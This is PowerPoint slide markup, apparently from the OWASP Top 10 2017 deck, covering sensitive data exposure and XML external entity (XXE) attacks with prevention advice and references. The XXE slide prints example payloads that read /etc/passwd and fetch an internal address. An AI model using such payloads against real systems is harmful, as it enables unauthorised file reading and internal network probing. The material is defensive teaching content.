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1"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varScale="1">
        <p:scale>
          <a:sx n="72" d="100"/>
          <a:sy n="72" d="100"/>
        </p:scale>
        <p:origin x="1356" y="-234"/>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ru-RU" sz="950" noProof="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Identify </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="95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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>of your </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950" noProof="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sz="95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ru-RU" sz="95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Define a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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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Conduct a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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-R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ru-R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sz="9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sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>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sz="900" noProof="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sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="ru-RU" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Note: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" b="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sz="900" noProof="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 This should be supported by security specialists.</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ru-RU" sz="950" kern="1200" noProof="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Conduct a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sz="950" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" kern="120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Identify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rPr>
            <a:t>the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rPr>
            <a:t>of your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Define a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sz="950" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" kern="120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sz="950" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU"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sz="900" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-R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ru-R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sz="900" kern="12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a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" kern="1200" noProof="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sz="900" kern="1200" noProof="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sz="900" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="ru-RU" sz="900" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Note: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" b="0" kern="120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sz="900" kern="1200" noProof="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 This should be supported by security specialists.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a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90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06.12.2017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12/6/2017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secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.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blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.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Vulnerability_Scanning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611.html"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ww.owasp.org/index.php/Source_Code_Analysis_Tools"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web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.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we.mitre.org/data/definitions/285.html" TargetMode="External"/><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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><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cwe.mitre.org/data/definitions/384.html"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s://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret"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github.com/danielmiessler/SecLists/tree/master/Passwords"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dangerous. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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ru-RU"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See ASVS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Crypto (V7)</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5"/>
              </a:rPr>
              <a:t>Data Prot (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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7"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Protect Data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OWASP Application Security Verification Standard (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>V7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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8"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Transport Layer Protection</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9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: User Privacy Protection</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0"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheets: Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Cryptographic Storage</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OWASP Security Headers Project</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13"/>
              </a:rPr>
              <a:t>Cheat Sheet: HSTS</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4"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for weak cryptography</a:t>
            </a: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5"/>
              </a:rPr>
              <a:t>CWE-220: Exposure of sens. information through data queries</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5"/>
              </a:rPr>
              <a:t>CWE-310: Cryptographic Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>CWE-311: Missing Encryption</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7"/>
              </a:rPr>
              <a:t>CWE-312: Cleartext Storage of Sensitive Information</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8"/>
              </a:rPr>
              <a:t>CWE-319: Cleartext Transmission of Sensitive Information</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9"/>
              </a:rPr>
              <a:t>CWE-326: Weak Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE-327: Broken/Risky Crypto</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20"/>
              </a:rPr>
              <a:t>CWE-359: Exposure of Private Information (Privacy Violation)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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>HSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>Argon2</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22"/>
              </a:rPr>
              <a:t>scrypt</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23"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId24"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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A3</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Prevalence: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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rather than directly attacking crypto, attackers steal keys, execute man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s client, e.g. browser. A manual attack is generally required. Previously </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>retrieved password databases</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> could be brute forced </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>by Graphics Processing Units (GPUs).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creden-tials, personal data, and credit cards, which often require protection as defined by laws or regulations such as the EU GDPR or local privacy laws.</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r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The easiest way is to upload a malicious XML file, if accepted:</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The attacker attempts to extract data from the server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  &lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt;!DOCTYPE foo [</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    &lt;!ELEMENT foo ANY &gt;</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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;</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    &lt;foo&gt;&amp;xxe;&lt;/foo&gt;</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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY xxe SYSTEM "https://192.168.1.1/private" &gt;]&gt;</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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   &lt;!ENTITY xxe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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>document type definitions (DTDs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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OWASP XXE Vulnerability</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5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XXE Prevention</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OWASP Cheat Sheet: XML Security</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CWE-611: Improper Restriction of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Billion Laughs Attack</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SAML Security XML External Entity Attack</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4"/>
              </a:rPr>
              <a:t>Detecting and exploiting XXE in SAML Interfaces</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sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reventing XXE requires:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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 Use dependency checkers. Update SOAP to SOAP 1.2 or higher.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Implement positive ("whitelisting") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>server-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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A4</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Technical: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900" b="0" i="0" u="none" strike="noStrike" noProof="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ru-RU"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ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>SAST</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hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>DAST</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rPr>
                        <a:t> tools require additional manual steps to detect and exploit this issue. Manual testers need to be trained in how to test for XXE, as it not commonly tested as of 2017.</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ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="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ru-RU" sz="90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ru-RU" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
